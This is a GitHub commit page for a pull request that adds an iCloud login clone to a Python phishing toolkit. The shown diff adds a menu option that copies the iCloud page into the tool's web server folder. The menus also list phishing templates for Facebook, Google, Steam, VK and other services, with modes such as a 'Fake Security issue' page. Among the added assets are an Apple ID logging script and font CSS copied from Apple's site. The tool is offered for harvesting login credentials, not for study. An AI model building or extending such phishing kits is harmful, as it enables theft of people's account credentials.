Merge pull request #70 from usama7628674/master

iCloud added
This commit is contained in:
Alexey Mozzhakov 2018-07-14 10:19:04 +03:00 committed by GitHub
commit 4f3fdf2a1a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
43 changed files with 2697 additions and 2 deletions

View File

@ -110,6 +110,8 @@ def runPhishing(social, option2):
copy_tree("WebPages/live_web/", "Server/www/") copy_tree("WebPages/live_web/", "Server/www/")
elif social == 'Steam': elif social == 'Steam':
copy_tree("WebPages/steam/", "Server/www/") copy_tree("WebPages/steam/", "Server/www/")
elif social == 'iCloud':
copy_tree("WebPages/iCloud/", "Server/www/")
elif option2 == '1' and social == 'Instagram': elif option2 == '1' and social == 'Instagram':
copy_tree("WebPages/Instagram_web/", "Server/www/") copy_tree("WebPages/Instagram_web/", "Server/www/")
elif option2 == '2' and social == 'Instagram': elif option2 == '2' and social == 'Instagram':
@ -211,7 +213,7 @@ def runPEnv():
system('clear') system('clear')
print ('\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, END)) print ('\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, END))
exit(0) exit(0)
option = input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END)) option = input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}15{0}]{1} iCloud\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
if option == '1': if option == '1':
loadModule('Facebook') loadModule('Facebook')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END)) option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
@ -268,6 +270,10 @@ def runPEnv():
loadModule('VK') loadModule('VK')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END)) option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
runPhishing('VK', option2) runPhishing('VK', option2)
elif option == '15':
loadModule('iCloud')
option2 = ''
runPhishing('iCloud', option2)
else: else:
exit(0) exit(0)

View File

@ -109,6 +109,8 @@ def runPhishing(social, option2):
copy_tree("WebPages/live_web/", "Server/www/") copy_tree("WebPages/live_web/", "Server/www/")
elif social == 'Steam': elif social == 'Steam':
copy_tree("WebPages/steam/", "Server/www/") copy_tree("WebPages/steam/", "Server/www/")
elif social == 'iCloud':
copy_tree("WebPages/iCloud/", "Server/www/")
elif option2 == '1' and social == 'Instagram': elif option2 == '1' and social == 'Instagram':
copy_tree("WebPages/Instagram_web/", "Server/www/") copy_tree("WebPages/Instagram_web/", "Server/www/")
elif option2 == '2' and social == 'Instagram': elif option2 == '2' and social == 'Instagram':
@ -209,7 +211,7 @@ def runPEnv():
system('clear') system('clear')
print ('\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, END)) print ('\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, END))
exit(0) exit(0)
option = input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END)) option = input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}15{0}]{1} iCloud\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
if option == '1': if option == '1':
loadModule('Facebook') loadModule('Facebook')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END)) option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
@ -266,6 +268,10 @@ def runPEnv():
loadModule('VK') loadModule('VK')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END)) option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
runPhishing('VK', option2) runPhishing('VK', option2)
elif option == '15':
loadModule('iCloud')
option2 = ''
runPhishing('iCloud', option2)
else: else:
exit(0) exit(0)

162
WebPages/iCloud/index.html Normal file

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.8 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.7 KiB

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.4 KiB

View File

@ -0,0 +1 @@
"use strict";!function(e){var t={URL:"/jslog",METHOD:"POST",EXCEPTION_PRETEXT:"APPLE ID : ",LOG_LEVEL:"ERROR",ALLOWED_LOG_LEVELS:["ERROR","DEBUG","OFF","INFO"],WARN_CAPTURE_CONSOLE_COLOR:"background: #FFF0F0; color: red",NAMESPACE_FOR_PM:"pmrpc.",POST_MESSAGE_LOG_STATUS:"ON"},n=t.URL,o=t.LOG_LEVEL,i=t.NAMESPACE_FOR_PM,r="",s="",a=t.POST_MESSAGE_LOG_STATUS,p=function(e){this.name="IllegalLogException",this.message=t.EXCEPTION_PRETEXT+e,this.stack=(new Error).stack},g=function(e,t){if(e&&"string"==typeof e&&t&&"string"==typeof t)try{window.sessionStorage&&sessionStorage.setItem(e,t)}catch(n){}},c=function(e){var t=" type, title, message are mandatory. ";if("undefined"==typeof e)throw new p("logObject is not defined.");if("undefined"==typeof e.type)throw new p("logObject.type is not defined."+t);if("undefined"==typeof e.title)throw new p("logObject.title is not defined."+t);if("undefined"==typeof e.message)throw new p("logObject.message is not defined."+t);return!0},E=function(e){if(!e)throw new p("Invalid endpoint URL: "+e);return!0},f=function(e){E(e)&&(n=e)},d=function(){return n},O=function(e){e&&"string"==typeof e&&e.toUpperCase().trim()&&-1!==t.ALLOWED_LOG_LEVELS.indexOf(e.toUpperCase().trim())&&(o=e.toUpperCase().trim())},l=function(e){return o},L=function(e){if(!e||"NULL"===e.toString().toUpperCase().trim()||"UNDEFINED"===e.toString().toUpperCase().trim())throw new p("SCNT token is not valid.");r=e},u=function(e){if(!e||"NULL"===e.toString().toUpperCase().trim()||"UNDEFINED"===e.toString().toUpperCase().trim())throw new p("CSRF token is not valid.");s=e},S=function(e,i){if(c(e)){var a=function(){g(t.EXCEPTION_PRETEXT,"Logging transaction failed or cancelled at."+n)};e.message=t.EXCEPTION_PRETEXT+e.message,e.details&&(e.details=JSON.stringify(e.details)),i&&L(i);try{var p=new XMLHttpRequest;p.open(t.METHOD,n,!0),p.setRequestHeader("Content-type","application/json"),p.setRequestHeader("Accept","application/json"),p.setRequestHeader("scnt",r),p.setRequestHeader("x-csrf-token",s),p.addEventListener("error",a),p.addEventListener("abort",a),p.onreadystatechange=function(){204!==p.status},"OFF"!==o&&("INFO"===o||"ERROR"===o?("ERROR"===e.type.toUpperCase().trim()||"INFO"===e.type.toUpperCase().trim())&&p.send(JSON.stringify(e)):"DEBUG"===o&&p.send(JSON.stringify(e)))}catch(E){}}},R=function(e){setTimeout(function(){throw e},0)},m=function(){return i},N=function(e){"string"==typeof e&&e.trim()&&(i=e)},y=function(){return a},T=function(e){a="string"==typeof e&&e.trim()&&-1!==["ON","OFF"].indexOf(e.toUpperCase().trim())?e.toUpperCase().trim():t.POST_MESSAGE_LOG_STATUS},w={log:S,onerror:R,getLoggingEndpoint:d,setLoggingEndpoint:f,setGlobalLogLevel:O,getGlobalLogLevel:l,setSCNT:L,setCSRF:u,getNamespaceForPM:m,setNamespaceForPM:N,getPMLoggingStatus:y,setPMLoggingStatus:T};p.prototype=Object.create(Error.prototype),p.prototype.constructor=p,e.AppleID=e.AppleID||{},e.AppleID.service=e.AppleID.service||{},e.AppleID.service.JSLogger=e.AppleID.service.JSLogger||w,window.onerror=function(n,o,r,s,p){if("ON"===a){var g=parseInt(1e16*Math.random()).toString(),c={jsonrpc:"2.0",method:"log",params:[{data:"AppleAuth failed to load."}],id:g};window.parent.postMessage(i+JSON.stringify(c),"*")}e.AppleID.service.JSLogger.log({title:p&&(p.name||"ERROR"),type:t.LOG_LEVEL,message:n,stacktrace:p&&(p.stack||JSON.stringify(p)),details:{file:o,lineno:r,colno:s,caught:"NO"}})}}(window),function(){try{window.AppleID.service.JSLogger.setLoggingEndpoint("/appleauth/jslog")}catch(e){}}();

Binary file not shown.

After

Width:  |  Height:  |  Size: 6.7 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 451 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 21 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 4.8 KiB

View File

@ -0,0 +1,365 @@
@font-face {
font-family:'SF Pro Display';
font-style:normal;
font-weight:100;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_ultralight.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_ultralight.woff") format("woff"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_ultralight.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Display 100';
src:url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_ultralight.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Display';
font-style:normal;
font-weight:200;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_thin.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_thin.woff") format("woff"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_thin.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Display 200';
src:url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_thin.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Display';
font-style:normal;
font-weight:300;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_light.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_light.woff") format("woff"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_light.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Display 300';
src:url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_light.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Display';
font-style:normal;
font-weight:500;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_medium.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_medium.woff") format("woff"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_medium.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Display 500';
src:url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_medium.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Display';
font-style:normal;
font-weight:600;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_semibold.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_semibold.woff") format("woff"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_semibold.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Display 600';
src:url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_semibold.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Display';
font-style:normal;
font-weight:700;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_bold.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_bold.woff") format("woff"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_bold.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Display 700';
src:url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_bold.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Display';
font-style:normal;
font-weight:800;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_heavy.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_heavy.woff") format("woff"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_heavy.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Display 800';
src:url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_heavy.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Display';
font-style:normal;
font-weight:900;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_black.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_black.woff") format("woff"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_black.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Display 900';
src:url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_black.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Display';
font-style:normal;
font-weight:400;
src:url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_regular.eot");
src:local('☺︎'), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_regular.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_regular.woff") format("woff"), url("/wss/fonts/SF-Pro-Display/v1/sf-pro-display_regular.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:normal;
font-weight:100;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_ultralight.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_ultralight.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_ultralight.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:italic;
font-weight:100;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_ultralight-italic.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_ultralight-italic.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_ultralight-italic.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text 100';
src:url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_ultralight.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:normal;
font-weight:200;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_thin.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_thin.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_thin.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:italic;
font-weight:200;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_thin-italic.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_thin-italic.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_thin-italic.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text 200';
src:url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_thin.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:normal;
font-weight:300;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_light.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_light.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_light.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:italic;
font-weight:300;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_light-italic.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_light-italic.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_light-italic.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text 300';
src:url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_light.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:italic;
font-weight:400;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_regular-italic.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_regular-italic.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_regular-italic.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:normal;
font-weight:500;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_medium.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_medium.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_medium.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:italic;
font-weight:500;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_medium-italic.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_medium-italic.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_medium-italic.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text 500';
src:url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_medium.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:normal;
font-weight:600;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_semibold.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_semibold.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_semibold.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:italic;
font-weight:600;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_semibold-italic.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_semibold-italic.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_semibold-italic.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text 600';
src:url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_semibold.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:normal;
font-weight:700;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_bold.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_bold.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_bold.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:italic;
font-weight:700;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_bold-italic.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_bold-italic.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_bold-italic.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text 700';
src:url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_bold.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:normal;
font-weight:800;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_heavy.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_heavy.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_heavy.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:italic;
font-weight:800;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_heavy-italic.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_heavy-italic.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_heavy-italic.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text 800';
src:url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_heavy.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:normal;
font-weight:900;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_black.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_black.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_black.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:italic;
font-weight:900;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_black-italic.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_black-italic.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_black-italic.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text 900';
src:url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_black.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Text';
font-style:normal;
font-weight:400;
src:url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_regular.eot");
src:local('☺︎'), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_regular.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_regular.woff") format("woff"), url("/wss/fonts/SF-Pro-Text/v1/sf-pro-text_regular.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Icons';
font-style:normal;
font-weight:300;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Icons/v1/SFProIcons_light.woff") format("woff"), url("/wss/fonts/SF-Pro-Icons/v1/SFProIcons_light.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Icons 300';
src:url("/wss/fonts/SF-Pro-Icons/v1/SFProIcons_light.eot");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Icons';
font-style:normal;
font-weight:500;
src:local('☺︎'), url("/wss/fonts/SF-Pro-Icons/v1/SFProIcons_medium.woff") format("woff"), url("/wss/fonts/SF-Pro-Icons/v1/SFProIcons_medium.ttf") format("truetype");
/* (C) 2015 Apple Inc. All rights reserved.*/
}
@font-face {
font-family:'SF Pro Icons 500';
